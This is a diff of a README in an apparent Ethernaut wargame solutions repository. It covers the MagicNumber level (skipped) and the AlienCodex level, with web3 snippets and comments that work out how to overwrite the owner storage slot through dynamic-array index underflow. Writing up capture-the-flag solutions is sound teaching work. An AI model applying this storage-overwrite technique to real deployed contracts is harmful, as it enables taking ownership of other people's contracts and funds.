n00b21337/Ethernaut-Solutions-V2/README.md

 ```

 ## 18. MagicNumber
-Don't really think this is a security challenge, it's more of a general coding challenge about how you can deploy a very small sized contract!
-I probably won't ever need to use this so I'm going to skip this floor.
-Nonetheless, if you're interested to do this challenge, read this [solution](https://medium.com/coinmonks/ethernaut-lvl-19-magicnumber-walkthrough-how-to-deploy-contracts-using-raw-assembly-opcodes-c50edb0f71a2) by Nicole Zhu.
+I don't really think this is a security challenge, it's more like a general coding challenge about how you can deploy a very small sized contract!
+I'm going to skip this floor but if you're interested to do this challenge, read this [solution](https://medium.com/coinmonks/ethernaut-lvl-19-magicnumber-walkthrough-how-to-deploy-contracts-using-raw-assembly-opcodes-c50edb0f71a2) by Nicole Zhu.

 ## 19. AlienCodex
 In order to solve this level, you need to understand about 3 things:
 1. Packing of storage variables to fit into one storage slot of 32bytes
 2. How values in dynamic arrays are stored
-3. How to modify an item outside of the size of the array.
+3. How to modify an item outside of the size of the array.ss

-This [example](https://programtheblockchain.com/posts/2018/03/09/understanding-ethereum-smart-contract-storage/) & the [solidity documentation](https://solidity.readthedocs.io/en/latest/miscellaneous.html#bytes-and-string) should prove useful to understanding point 2.
-However, I would like to point out that there is a mistake in the example.
-If you can find the mistake, you probably have a solid understanding of point 2.
-Note that the solution below uses web3 to interact with the contract because there was an error on Ethernaut (0.5.0)'s end preventing me from getting an instance.
+This [example](https://programtheblockchain.com/posts/2018/03/09/understanding-ethereum-smart-contract-storage/) should prove useful to understanding point 2.
 ```
-// After deploying your contract, you need to determine which is your instance contract.
-// Find the transaction on etherscan, click on Internal Transactions
-// Look for the line "create_0_0... the To address represents your deployed contract

-// First you need to make contact var instance = "<insert contract instance here">

-// Check who is owner
-var ownerPayload = web3.eth.abi.encodeFunctionCall({
-    name: 'owner',
-    type: 'function',
-    inputs: []
-}, []); // 0x8da5cb5b

-await web3.eth.call({to: instance, data: ownerPayload});

-var makeContactPayload = web3.eth.abi.encodeFunctionCall({
-    name: 'make_contact',
-    type: 'function',
-    inputs: []
-}, []); // 0x58699c55

-await web3.eth.sendTransaction({to: instance, from: player, data: makeContactPayload});

-var concatenatedStorage = await web3.eth.getStorageAt(instance, 0); // 0x000000000000000000000001xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx where the x represents your address and 1 represents contact = true
+// What is in slot 0 of my storage? await web3.eth.getStorageAt(instance, 0); // 0x000000000000000000000001xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx where the x represents your address and 1 represents contact = true

-// Number of elements in dynamic array (codex) is stored at index 1
+// Number of elements in dynamic array (codex) is stored at index 1 i.e. web3.eth.getStorageAt(instance, 1)
 // Actual elements stored in dynamic array (codex) can be found at index uint256(keccak256(1)); // 80084422859880547211683076133703299733277748156566366325829078699459944778998
 // New elements added to dynamic array (codex) can be found at index uint256(keccak256(1)) + index in array e.g.
 // First element is found at uint256(keccak256(1)) + 0;
 // Second element is found at uint256(keccak256(1)) + 1;
 // Third element is found at uint256(keccak256(1)) + 2;

 // We want to modify storage slot 0 since that is where owner is stored at.
 // We need a value N such that uint256(keccak256(1)) + N = 0
 // 0 (or max value for uint256) - uint256(keccak256(1)) = N